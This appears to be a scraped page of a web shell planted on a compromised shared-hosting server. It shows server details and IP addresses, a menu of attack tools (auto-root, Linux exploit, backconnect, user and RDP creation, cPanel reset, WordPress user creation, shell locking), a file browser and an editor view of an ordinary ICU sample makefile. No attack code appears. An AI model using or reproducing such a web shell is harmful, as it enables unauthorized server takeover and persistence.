Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 18.189.182.31
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
libicu /
usr /
share /
doc /
alt-libicu-devel /
samples /
[ HOME SHELL ]
Name
Size
Permission
Action
all
[ DIR ]
drwxr-xr-x
break
[ DIR ]
drwxr-xr-x
cal
[ DIR ]
drwxr-xr-x
case
[ DIR ]
drwxr-xr-x
citer
[ DIR ]
drwxr-xr-x
coll
[ DIR ]
drwxr-xr-x
csdet
[ DIR ]
drwxr-xr-x
date
[ DIR ]
drwxr-xr-x
datecal
[ DIR ]
drwxr-xr-x
datefmt
[ DIR ]
drwxr-xr-x
dtitvfmtsample
[ DIR ]
drwxr-xr-x
dtptngsample
[ DIR ]
drwxr-xr-x
layout
[ DIR ]
drwxr-xr-x
legacy
[ DIR ]
drwxr-xr-x
msgfmt
[ DIR ]
drwxr-xr-x
numfmt
[ DIR ]
drwxr-xr-x
plurfmtsample
[ DIR ]
drwxr-xr-x
props
[ DIR ]
drwxr-xr-x
strsrch
[ DIR ]
drwxr-xr-x
translit
[ DIR ]
drwxr-xr-x
uciter8
[ DIR ]
drwxr-xr-x
ucnv
[ DIR ]
drwxr-xr-x
udata
[ DIR ]
drwxr-xr-x
ufortune
[ DIR ]
drwxr-xr-x
ugrep
[ DIR ]
drwxr-xr-x
uresb
[ DIR ]
drwxr-xr-x
ustring
[ DIR ]
drwxr-xr-x
Makefile
2.98
KB
-rw-r--r--
Makefile.in
2.99
KB
-rw-r--r--
defs.mk
1.16
KB
-rw-r--r--
readme.txt
2.78
KB
-rw-r--r--
rules.mk
1.27
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : defs.mk
# Copyright (C) 2016 and later: Unicode, Inc. and others. # License & terms of use: http://www.unicode.org/copyright.html#License # # Copyright (c) 2002-2012 IBM, Inc. and others # Sample code makefile definitions CLEANFILES=*~ $(TARGET).out #################################################################### # Load ICU information. You can copy this to other makefiles ####### #################################################################### CC=$(shell icu-config --cc) CXX=$(shell icu-config --cxx) CPPFLAGS=$(shell icu-config --cppflags) CFLAGS=$(shell icu-config --cflags) CXXFLAGS=$(shell icu-config --cxxflags) LDFLAGS =$^ $(shell icu-config --ldflags) LDFLAGS_USTDIO =$(shell icu-config --ldflags-icuio) INVOKE=$(shell icu-config --invoke) GENRB=$(shell icu-config --invoke=genrb) GENRBOPT= PKGDATA=$(shell icu-config --invoke=pkgdata) SO=$(shell icu-config --so) PKGDATAOPTS=-r $(shell icu-config --version) -w -v -d . # default - resources in same mode as ICU RESMODE=$(shell icu-config --icudata-mode) #################################################################### ### Project independent things (common) ### We depend on gmake for the bulk of the work RMV=rm -rf
Close